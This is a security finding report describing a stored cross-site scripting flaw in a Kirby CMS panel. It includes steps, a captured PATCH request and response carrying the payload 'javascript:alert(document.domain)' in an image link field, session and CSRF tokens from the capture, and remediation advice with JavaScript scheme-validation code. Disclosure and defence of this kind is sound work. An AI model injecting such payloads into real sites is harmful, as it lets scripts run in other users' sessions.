Stored Cross-Site Scripting

The tester discovered that an image can be inserted into a page and that the value of the image's link parameter is written into the href attribute of the rendered element. Consequently, an XSS payload can be stored in that field, and the JavaScript executes when a user clicks the image.

Step by Step

  1. Edit the content layout and add an image.
  2. Choose the image and insert the XSS payload into the link field: "javascript:alert(document.domain)".
  3. Upon clicking on the image, the JavaScript is executed.


Request:

POST /BGZUwFZY/api/pages/microsite HTTP/1.1
Host: trykirby.com
Cookie: kirby_session=910521efece58be7ce81f24f7c2b5978f21a791a%2B1707762274.dd8b11107e02a3859af3.2da7b8302b8e19193900caedabf370a68d674e23f80cf58135327d573242604b; instance=410dd31498585dbf2529a45d1da40600f8a7c87c%2Bhttps%3A%2F%2Ftrykirby.com%2FBGZUwFZY%2F; snipcart-cart=37440eed-2a09-4ed3-b534-515b00f4301c
Content-Length: 1328
Sec-Ch-Ua: "Not A(Brand";v="99", "Microsoft Edge";v="121", "Chromium";v="121"
X-Language: null
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0
Content-Type: application/json
X-Csrf: dffaa6b125814485f872c3bfb34fa828d0bdbb5597fa0cbfcd8306bf6f302683
X-Http-Method-Override: PATCH
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://trykirby.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: same-origin
Sec-Fetch-Dest: empty
Referer: https://trykirby.com/BGZUwFZY/panel/pages/microsite?tab=content
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

{"modules":[{"attrs":[],"columns":[{"blocks":[{"content":{"location":"kirby","image":[{"id":"micro-1.jpg","image":{"back":"black","color":"orange-500","cover":false,"icon":"image","url":"https://trykirby-1653.kxcdn.com/_media/65b91907b669f/media/pages/microsite/416aa80338-1706600576/micro-1.jpg","src":"data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw","srcset":"https://trykirby-1653.kxcdn.com/_media/65b91907b669f/media/pages/microsite/416aa80338-1706600576/micro-1.jpg?width=38 38w, https://trykirby-1653.kxcdn.com/_media/65b91907b669f/media/pages/microsite/416aa80338-1706600576/micro-1.jpg?width=76 76w"},"info":"","link":"/pages/microsite/files/micro-1.jpg","sortable":true,"text":"micro-1.jpg","uuid":"file://y3c8TuQhVK2cPQdi","dragText":"(image: micro-1.jpg)","filename":"micro-1.jpg","type":"image","url":"https://trykirby-1653.kxcdn.com/_media/65b91907b669f/media/pages/microsite/416aa80338-1706600576/micro-1.jpg"}],"src":"","alt":"","caption":"","link":"**javascript:alert(document.domain)**","ratio":"","crop":false},"id":"cec0b4ee-8cc5-4799-87de-a4237f43e3b7","isHidden":false,"type":"image"}],"id":"057e4782-617e-455f-8bac-04bd9a8a1ab3","width":"1/1"}],"id":"6255aaaa-b726-4375-b675-3654986302c7"}],"description":"Representative one-pagers for your product","uuid":"VZlscZfc8c5gEiwM"}

Response:

HTTP/1.1 200 OK
Date: Mon, 12 Feb 2024 16:32:03 GMT
Server: Apache
Cache-Control: no-store, private
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Content-Length: 1895
Connection: close
Content-Type: application/json; charset=UTF-8

{"code":200,"data":{"content":{"modules":[{"attrs":[],"columns":[{"blocks":[{"content":{"location":"kirby","image":[{"id":"micro-1.jpg","image":{"back":"black","color":"orange-500","cover":false,"icon":"image","url":"https:\/\/trykirby-1653.kxcdn.com\/_media\/65b91907b669f\/media\/pages\/microsite\/416aa80338-1706600576\/micro-1.jpg","src":"data:image\/gif;base64,R0lGODlhAQABAIAAAP\/\/\/wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw","srcset":"https:\/\/trykirby-1653.kxcdn.com\/_media\/65b91907b669f\/media\/pages\/microsite\/416aa80338-1706600576\/micro-1.jpg?width=38 38w, https:\/\/trykirby-1653.kxcdn.com\/_media\/65b91907b669f\/media\/pages\/microsite\/416aa80338-1706600576\/micro-1.jpg?width=76 76w"},"info":"","link":"\/pages\/microsite\/files\/micro-1.jpg","sortable":true,"text":"micro-1.jpg","uuid":"file:\/\/y3c8TuQhVK2cPQdi","dragText":"(image: micro-1.jpg)","filename":"micro-1.jpg","type":"image","url":"https:\/\/trykirby-1653.kxcdn.com\/_media\/65b91907b669f\/media\/pages\/microsite\/416aa80338-1706600576\/micro-1.jpg"}],"src":"","alt":"","caption":"","link":"javascript:alert(document.domain)","ratio":"","crop":false},"id":"cec0b4ee-8cc5-4799-87de-a4237f43e3b7","isHidden":false,"type":"image"}],"id":"057e4782-617e-455f-8bac-04bd9a8a1ab3","width":"1\/1"}],"id":"6255aaaa-b726-4375-b675-3654986302c7"}],"title":"Microsite","description":"Representative one-pagers for your product","uuid":"VZlscZfc8c5gEiwM"},"id":"microsite","num":6,"options":{"access":true,"changeSlug":false,"changeStatus":false,"changeTemplate":false,"changeTitle":false,"create":true,"delete":false,"duplicate":false,"list":true,"move":true,"preview":true,"read":true,"sort":true,"update":true},"parent":null,"slug":"microsite","status":"listed","template":"microsite","title":"Microsite","url":"https:\/\/trykirby.com\/BGZUwFZY\/microsite","uuid":"page:\/\/VZlscZfc8c5gEiwM"},"status":"ok","type":"model"}


Solution

Cross-site scripting (XSS) is a vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users. To prevent XSS attacks, implement the following measures:

  1. Input Validation and Output Encoding: Validate all user-supplied input on the server side and encode it for the context in which it is output (here, an href attribute) before it reaches the browser. For a link field, validation means accepting only an allow-list of URL schemes such as http and https, which stops a javascript: value like the one above from being stored at all.
  2. Escape Untrusted Data: Escape special characters (such as <, >, ', ") in user input before displaying it on a web page, so the browser does not interpret the input as HTML or JavaScript. Note that escaping alone does not address this finding: javascript:alert(document.domain) contains none of those characters and still executes when it sits in an href, so the scheme check from point 1 is required as well.
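The scheme check described in point 1, written as an added example in JavaScript (not Kirby's own code): it rejects javascript: and data: links in the image block's link field and walks a page-update body shaped like the PATCH request above. The function names, the allow-list, and the constructed sample body are assumptions; the modules/columns/blocks/content.link layout follows the request shown in this report.

```javascript
// Added example, not code from Kirby. Allow-listed schemes are an assumption;
// a relative path (no scheme) is also accepted, as in the original "link" value.
const SAFE_SCHEMES = new Set(["http:", "https:", "mailto:", "tel:"]);

// Resolve against a dummy base so relative links parse. The WHATWG URL parser
// lowercases the scheme and strips tabs/newlines, so "JavaScript:" and
// "java\tscript:" are both reported as "javascript:" and rejected.
function isSafeLink(raw) {
  if (typeof raw !== "string") return false;
  const link = raw.trim();
  if (link === "") return true; // empty link field: nothing is rendered
  let url;
  try {
    url = new URL(link, "https://base.invalid/");
  } catch {
    return false; // unparseable: reject rather than guess
  }
  return SAFE_SCHEMES.has(url.protocol);
}

// Walk the layout body (modules -> columns -> blocks) and collect every image
// block whose link would be rejected, so the update can be refused server-side.
function findUnsafeImageLinks(body) {
  const unsafe = [];
  for (const mod of body.modules ?? []) {
    for (const col of mod.columns ?? []) {
      for (const block of col.blocks ?? []) {
        if (block.type !== "image") continue;
        const link = block.content?.link ?? "";
        if (!isSafeLink(link)) unsafe.push({ id: block.id, link });
      }
    }
  }
  return unsafe;
}

// Constructed sample mirroring the shape of the report's PATCH body; ids are made up.
const SAMPLE_BODY = {
  modules: [{ columns: [{ blocks: [
    { id: "block-a", type: "image", content: { link: "javascript:alert(document.domain)" } },
    { id: "block-b", type: "image", content: { link: "/pages/microsite/files/micro-1.jpg" } },
    { id: "block-c", type: "image", content: { link: " JavaScript:alert(1)" } },
    { id: "block-d", type: "text",  content: { text: "not an image block" } },
  ] }] }],
};

console.log(findUnsafeImageLinks(SAMPLE_BODY)); // reports block-a and block-c
```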